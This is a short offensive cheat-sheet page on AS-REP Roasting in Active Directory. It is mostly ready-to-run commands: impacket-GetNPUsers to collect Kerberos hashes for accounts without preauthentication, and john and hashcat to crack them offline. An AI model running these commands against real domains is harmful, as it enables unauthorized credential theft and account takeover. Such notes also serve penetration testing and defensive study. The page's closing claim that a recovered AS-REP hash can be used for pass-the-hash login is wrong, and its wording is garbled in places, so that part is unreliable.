AS-REP Roasting
Last modified: 2022-12-30
AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory.
Enumeration
Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting.
# Find a password hashes of given users
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt
# Find a password hash of given user
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat
If we find a password hash, crack it.
john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0 hash.txt wordlist.txt
If we find a password hash, crack it or use it to login with pass the hash.